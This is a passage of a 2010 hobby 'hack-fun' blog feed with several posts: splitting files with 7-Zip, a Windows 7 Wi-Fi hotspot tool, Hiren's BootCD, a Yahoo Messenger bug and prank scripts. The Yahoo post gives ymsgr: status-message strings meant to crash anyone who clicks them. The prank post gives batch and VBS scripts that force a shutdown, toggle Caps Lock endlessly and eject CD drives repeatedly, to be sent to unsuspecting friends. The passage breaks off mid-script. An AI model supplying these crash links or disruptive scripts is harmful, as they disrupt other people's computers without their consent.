&amp;nbsp;&amp;nbsp;&amp;nbsp; * On this tutorial I use 7Zip (you can use WinZip or WinRAR as alternative software). Right clicking mouse on the large file to split, on the context menu select “7-Zip” then “add to archive”&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJILW65o8ixHbCuwXRpSNWO2vKateUF5elYwOuQOzX27Pf-HwKh_icoy0wzcYUsVFxV83uXkhuBR4ifWEzyKTj1G20Gy2wKPUw85MmlnFXSY8fFMd0M7l-YC4gjCv5Hdw3lEjqrPuS0CNm/s1600/Split-File-Step-1.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJILW65o8ixHbCuwXRpSNWO2vKateUF5elYwOuQOzX27Pf-HwKh_icoy0wzcYUsVFxV83uXkhuBR4ifWEzyKTj1G20Gy2wKPUw85MmlnFXSY8fFMd0M7l-YC4gjCv5Hdw3lEjqrPuS0CNm/s320/Split-File-Step-1.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;&amp;nbsp;Determine file size for each file split. For example I want to split a large file into a few files with file size for each files is 1 Megabyte. Entering 1M into “Split to Volume, bytes”. Then click Ok&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEBfd5YWYhG_d3amgTFxNSHHKyzrpRDp28m-2UIHBWTPt2XKVWrwH7Kl8tQyIfEhw_BVOn6MSCI2vWmKuTTpxoOkeT5-PmbLGCelgcN4Y0eM_Ki7ojwpgKG1SyW4qaSKpOKVUgNFQLdxD-/s1600/Split-File-Step-2-400x347.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEBfd5YWYhG_d3amgTFxNSHHKyzrpRDp28m-2UIHBWTPt2XKVWrwH7Kl8tQyIfEhw_BVOn6MSCI2vWmKuTTpxoOkeT5-PmbLGCelgcN4Y0eM_Ki7ojwpgKG1SyW4qaSKpOKVUgNFQLdxD-/s320/Split-File-Step-2-400x347.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;The result, I get a few file with 1 Megabyte size for each file. Now you can easy upload the file on&amp;nbsp; online storage or on online file hosting such as Ziddu, 4Shared, MediaFire, etc.&lt;span style=&quot;background-color: magenta;&quot;&gt; (Warning: don’t rename the files to prevent error when extract and merge them into one file)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDkqQTWEYwRwTJaQOVqNy9JASZFSe47EjnflnxqBJn-9ZNg8R2MixHPBmfzIUxXsIJnJSiPWOYmlbK8ElpToR4WCTXwdTC2id8KnXXrs-2KzlKe5-oI8CerKWNznc_XeMdhUQsM_d1YEf3/s1600/Split-result-400x222.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDkqQTWEYwRwTJaQOVqNy9JASZFSe47EjnflnxqBJn-9ZNg8R2MixHPBmfzIUxXsIJnJSiPWOYmlbK8ElpToR4WCTXwdTC2id8KnXXrs-2KzlKe5-oI8CerKWNznc_XeMdhUQsM_d1YEf3/s320/Split-result-400x222.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;&amp;nbsp;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;2. How to Extract and Combine all file into one file.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you share files that have been split, tell the software you use to split the file to the people/friend who download your files because on my experiment I getting error when combine the file using other software.&lt;br /&gt;
&lt;br /&gt;
Because I use 7-Zip software to split the file which I share, so to extract and merge the file into one file I use 7-Zip again, here how:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * From windows explorer, right clicking mouse on the fist file to extract select “7-Zip” then select “Extract File” or “Extract Here”&amp;nbsp; (Note: usually the order of the file name is marked with numbers)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_TP8vY0_HWs1mB8fgsFaB3psKDW1rA4xb0_vvyM4Sg6QjQf8vPjxwRUm3EPNKRuGcvs0p9hnvqpGeOebADDldx38TYqKWizexsZ-QMhvrVsXE8f4Yt31ADTAMX44VGxzktP1hZjIBp3zb/s1600/Merge-Split-File-400x254.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_TP8vY0_HWs1mB8fgsFaB3psKDW1rA4xb0_vvyM4Sg6QjQf8vPjxwRUm3EPNKRuGcvs0p9hnvqpGeOebADDldx38TYqKWizexsZ-QMhvrVsXE8f4Yt31ADTAMX44VGxzktP1hZjIBp3zb/s320/Merge-Split-File-400x254.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * The result, you’ll get one large file like the source file.&lt;br /&gt;
&lt;br /&gt;
I hope this post can help you to share your useful file on internet.&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/how-to-send-large-file-on-internet-for.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJILW65o8ixHbCuwXRpSNWO2vKateUF5elYwOuQOzX27Pf-HwKh_icoy0wzcYUsVFxV83uXkhuBR4ifWEzyKTj1G20Gy2wKPUw85MmlnFXSY8fFMd0M7l-YC4gjCv5Hdw3lEjqrPuS0CNm/s72-c/Split-File-Step-1.gif" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-3353247222898225148</guid><pubDate>Thu, 02 Sep 2010 16:13:00 +0000</pubDate><atom:updated>2010-09-02T21:43:48.909+05:30</atom:updated><title></title><description>&lt;span class=&quot;fullpost&quot;&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;embed align=&quot;middle&quot; flashvars=&quot;cy=bb&amp;amp;il=1&amp;amp;channel=2810246167517334784&amp;amp;site=widget-00.slide.com&quot; name=&quot;flashticker&quot; quality=&quot;high&quot; salign=&quot;l&quot; scale=&quot;noscale&quot; src=&quot;http://widget-00.slide.com/widgets/slideticker.swf&quot; style=&quot;height: 320px; width: 400px;&quot; type=&quot;application/x-shockwave-flash&quot; wmode=&quot;transparent&quot;&gt;&lt;/embed&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left; width: 400px;&quot;&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&amp;nbsp; &lt;a href=&quot;http://www.slide.com/pivot?cy=bb&amp;amp;at=un&amp;amp;id=2810246167517334784&amp;amp;map=F&quot; target=&quot;_blank&quot;&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/blog-post.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-3049018916501974672</guid><pubDate>Thu, 02 Sep 2010 16:12:00 +0000</pubDate><atom:updated>2010-09-02T21:42:50.785+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networking</category><title>How To Use Windows 7 to create a Wi-Fi network without using Router</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhugIEBR9plfN9b1I7wiY4qOTwj3rbo_jmNFTqarrkXd0lVpTZx0Sfe88hYvfXixkWJggvAtUd-VHYMXQl8hhgiuemsyl0IJUTVtaM9Lr23qcqp9GtkqOTEqcruHBOkiaS9EiJ2gVXga179/s1600/VirtualRouter_09_Screenshot001-446-x-258.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhugIEBR9plfN9b1I7wiY4qOTwj3rbo_jmNFTqarrkXd0lVpTZx0Sfe88hYvfXixkWJggvAtUd-VHYMXQl8hhgiuemsyl0IJUTVtaM9Lr23qcqp9GtkqOTEqcruHBOkiaS9EiJ2gVXga179/s320/VirtualRouter_09_Screenshot001-446-x-258.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;If you have got Wi-Fi in your laptop and have Windows 7 installed in it then you can easily turn it into a Wi-Fi hotspot and share your net connection with other people in the range and Virtual Router is the easiest way to do so.&lt;br /&gt;
&lt;br /&gt;
Virtual Router is an open source software which leverages the Wireless Hosted Network API which is a part of the new Windows Operating Systems (Windows 7 and Windows server 2008).&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; With this feature, a Windows computer can use a single physical wireless adapter to connect as a client to a hardware access point (AP), while at the same time acting as a software AP allowing other wireless-capable devices to connect to it. This feature requires that a Hosted Network capable wireless adapter is installed in the local computer. (quoted from MS library)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;The program is really simple to use. After downloading and installing the software all you have to do is specify the network name and password to access this network. It uses the WPA-2 encryption to protect the wireless network from unwanted users.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;The program requires only 20mb of RAM and is pretty simple to understand and use. Requires Windows 7 or Windows server 2008 to run.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://virtualrouter.codeplex.com/releases/view/36035&quot;&gt;Download Virtual Router&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://virtualrouter.codeplex.com/&quot;&gt;Virtual Router Homepage&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/how-to-use-windows-7-to-create-wi-fi.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhugIEBR9plfN9b1I7wiY4qOTwj3rbo_jmNFTqarrkXd0lVpTZx0Sfe88hYvfXixkWJggvAtUd-VHYMXQl8hhgiuemsyl0IJUTVtaM9Lr23qcqp9GtkqOTEqcruHBOkiaS9EiJ2gVXga179/s72-c/VirtualRouter_09_Screenshot001-446-x-258.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7155447602629755529</guid><pubDate>Thu, 22 Jul 2010 11:15:00 +0000</pubDate><atom:updated>2010-07-22T16:45:39.580+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Messenger</category><title>Bug in Yahoo Messenger 10 Status Message – Disconnected Without Software</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1g_405HzmYxB9QMo7QjPrwncb9c647bGYTfQJAmHnvkOte-61X5cPctZKenA1ozxqX1XhzgC4Yd3wuFS8BcLnNim7P-qr3fqkA30gPYJHtO0J82Phz2uhLybJXqXOC9oo-oMZ6QWRjuC/s1600/bugym10.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1g_405HzmYxB9QMo7QjPrwncb9c647bGYTfQJAmHnvkOte-61X5cPctZKenA1ozxqX1XhzgC4Yd3wuFS8BcLnNim7P-qr3fqkA30gPYJHtO0J82Phz2uhLybJXqXOC9oo-oMZ6QWRjuC/s320/bugym10.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;We just knew that by using Yahoo Messenger 10 there is one important bug that can be used to make someone disconnected from Yahoo Messenger. We found this tricks while we go to one of biggest Yahoo Messenger forum (you should know about it). This would be important to be resolved / fixed soon by yahoo. Here are the tricks:&lt;br /&gt;
&lt;br /&gt;
Just put this code to your Yahoo Messenger Status Message (We tested in Version 10)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ymsgr:-kill View My Webcam&lt;br /&gt;
&lt;br /&gt;
You can also change the View My Webcam text into something else. Whenever someone click your Status Message link, it would make him/her disconnected in a second (very fast indeed): Yahoo Messenger Crash / Shutdown Automatically.&lt;br /&gt;
&lt;br /&gt;
Another Status Message that would make someone who clicked disconnect:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ymsgr:call?&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp; / or add a name&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ymsgr:getplugin?&amp;amp;type=4&amp;amp;id=jammer&amp;amp;name=&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ymsgr:chat?&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&lt;br /&gt;
&lt;br /&gt;
Remember this bug only appears in Yahoo Messenger &lt;br /&gt;
&lt;br /&gt;
(even some users said that sometimes it also works with YM Ver 9).&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.messengeroo.com/yahoo-messenger/security/bug-in-yahoo-messenger-10-status-message-disconnected-without-software/&quot;&gt;Source&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/07/bug-in-yahoo-messenger-10-status.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1g_405HzmYxB9QMo7QjPrwncb9c647bGYTfQJAmHnvkOte-61X5cPctZKenA1ozxqX1XhzgC4Yd3wuFS8BcLnNim7P-qr3fqkA30gPYJHtO0J82Phz2uhLybJXqXOC9oo-oMZ6QWRjuC/s72-c/bugym10.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7625527064806247204</guid><pubDate>Thu, 22 Jul 2010 11:12:00 +0000</pubDate><atom:updated>2010-07-22T16:43:33.263+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Open Source Operating system</category><title>Hiren&#39;s BootCD 10.6 (Latest Operating System)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiExmW9YCR5Y_tZMjhUSISLHkhlFi8OTQAS08yAo7Thq5aZTM6ROkGXUQ2panT6M5zREMOO3PCW8Rys4BYAHLr-UjMF1E3bEyd9x6wrC_f9YgTPXj8zQKQGAjqi6WE_3ntBHK4QjK5bWRBY/s1600/1267023131_hirens-boot-cd.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiExmW9YCR5Y_tZMjhUSISLHkhlFi8OTQAS08yAo7Thq5aZTM6ROkGXUQ2panT6M5zREMOO3PCW8Rys4BYAHLr-UjMF1E3bEyd9x6wrC_f9YgTPXj8zQKQGAjqi6WE_3ntBHK4QjK5bWRBY/s320/1267023131_hirens-boot-cd.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&amp;nbsp;Hello Friends, most people mailing me to give an article on a new advance bootable operating systemSo here is your new powerfull OS named Hiren&#39;s BootCD ,(HBCD) is a completely free bootable CD that contains a load of useful tools you can make use of in a variety of situations like analyzing, recovering and fixing your computer even if the primary operating system can not be booted.&lt;br /&gt;
&lt;br /&gt;
It is a great resource for anyone with computer problems who is having trouble accessing the internet to download programs in an attempt to fix it. It has a multitude of tools divided into a number of categories like partitioning tools, backup, recovery and BIOS/CMOS tools to name a few.&lt;br /&gt;
&lt;br /&gt;
With some simple knowledge about what is contained on the CD, you can use it to repair many problems computer like hard drive failure, virus infections, partitioning, password recovery and data recovery.&lt;br /&gt;
We may call it as an emergency cd which every computer technician or home user must have.&lt;br /&gt;
We thank and appreciate Hiren for his great BootCD. This site is just a download place for Hiren&#39;s BootCD and is not related with Hiren. For developer&#39;s homepage please visit Hiren&#39;s Homepage under the links.&lt;br /&gt;
Partition Tools.&lt;br /&gt;
&lt;br /&gt;
If you need to make changes to the partitions on your computer, there are several applications that provides various levels of functionality for accomplishing this goal. You can both create and delete partitions from your computer, even while there are other partitions on the hard drive you are modifying. You can also resize partitions if needed, to change how much space is allocated to them.&lt;br /&gt;
&lt;br /&gt;
Backup and Recovery&lt;br /&gt;
There are several backup and recovery tools on Hiren&#39;s BootCD. Backup tools like GetDataBack, HDD Scan, Partition Find and Mount, PhotoRec, Recuva, Undelete... let you copy data off of your hard drive and schedule automatic backups to ensure your data is saved to another location. You can also recover deleted data, whether that data was deleted intentionally or accidentally. There are also a few tools that will help you recover data from damaged or corrupted portions of your hard drive if you are unable to recover them through other methods.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
Testing Tools&lt;br /&gt;
Hiren&#39;s BootCD provides a variety of tools for testing different aspects of your computer. If you suspect that your RAM is corrupted or that a piece of hardware on your machine is not functioning properly, there are several applications you can run to determine the problems. You can also perform hard drive tests to see whether your hard drive is physically damaged, and get a report on how much longer your hard drive is expected to work.&lt;br /&gt;
Password Tools&lt;br /&gt;
Password recovery and modification tools are also provided on Hiren&#39;s BootCD. You can change the administrator password on Windows machines, and there are utilities for saving passwords for your online accounts in an encrypted format. You can also encrypt your entire hard drive with Hiren&#39;s BootCD so that a password is required to read or write any data from or to your hard drive.&lt;br /&gt;
&lt;br /&gt;
Changes from Hiren&#39;s BootCD 10.5 to 10.6&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Update Checker 1.037, + Speccy 1.02.156, + BootICE 0.78, + MyUninstaller 1.65, + SearchMyFiles 1.47, + Glary Registry Repair 3.3.0.852, + HDHacker 1.4, + Delete Doctor 2.2, + Write Protect USB Devices, + Protect a Drive from Autorun Virus, + SumatraPDF 1.1, + RegShot 1.8.2, + KeyTweak 2.3.0, + Bart&#39;s Stuff Test 5.1.4 - Partition Magic, - Drive Image 2002, - Easy Recovery Opera Web Browser 9.27, SuperAntispyware 4.39.1002 (2606), SpywareBlaster 4.3 (2606), Malwarebytes Anti-Malware 1.46 (2606), Spybot - Search &amp;amp; Destroy 1.6.2 (2606), DriveImageXML 2.14, 7-Zip 9.15b, Total Commander 7.55, CCleaner 2.33.1184, MBRWizard 3.0.48, CurrPorts 1.81, Network Password Recovery 1.24, Defraggler 1.20.201, Bulk Rename Utility 2.7.1.2, RIPLinux 9.8, GParted Partition Editor 0.6.0b2, ProduKey 1.41, Process Explorer 12.04, DiskCryptor 0.9, Autoruns 10.01, PCI 32 Sniffer 1.4 (2606), SIW 2010.0428, UnknownDevices 1.4.20 (2606), Astra 5.46, HWiNFO 5.5.0, PCI and AGP info Tool (2606), ComboFix (2606), Dr.Web CureIt! Antivirus (2606)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&amp;nbsp;&lt;a href=&quot;http://hotfile.com/dl/53375744/8e3594b/HBCD.10.6__9Down.COM.rar.html&quot;&gt;Download&lt;/a&gt;&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/07/hirens-bootcd-106-latest-operating.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiExmW9YCR5Y_tZMjhUSISLHkhlFi8OTQAS08yAo7Thq5aZTM6ROkGXUQ2panT6M5zREMOO3PCW8Rys4BYAHLr-UjMF1E3bEyd9x6wrC_f9YgTPXj8zQKQGAjqi6WE_3ntBHK4QjK5bWRBY/s72-c/1267023131_hirens-boot-cd.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7540919916387738706</guid><pubDate>Fri, 21 May 2010 15:17:00 +0000</pubDate><atom:updated>2010-05-21T20:47:25.680+05:30</atom:updated><title>10 Most Dangerous Scripts To Prank Your Friend :)</title><description>&lt;span style=&quot;border-collapse: collapse; font-family: Verdana; line-height: 15px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;ALL OF THEZE COMMANDZ ARE TO BE TYPED IN&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;NOTEPAD...&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
--- --- --- --- --- --- --- --- ---&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;1) Convey your friend a lil&#39; message and shut down his / her computer:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
msg * I don&#39;t like you&lt;br /&gt;
shutdown -c &quot;Error! You are too&amp;nbsp;******!&quot; -s&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.BAT&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; in All Files and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;2) Toggle your friend&#39;s Caps Lock button simultaneously:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys &quot;{CAPSLOCK}&quot;&lt;br /&gt;
loop&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;3) Continually pop out your friend&#39;s CD Drive. If he / she has more than one, it pops out all of them!&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot;)&lt;br /&gt;
Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;
do&lt;br /&gt;
if colCDROMs.Count &amp;gt;= 1 then&lt;br /&gt;
For i = 0 to colCDROMs.Count - 1&lt;br /&gt;
colCDROMs.Item(i).Eject&lt;br /&gt;
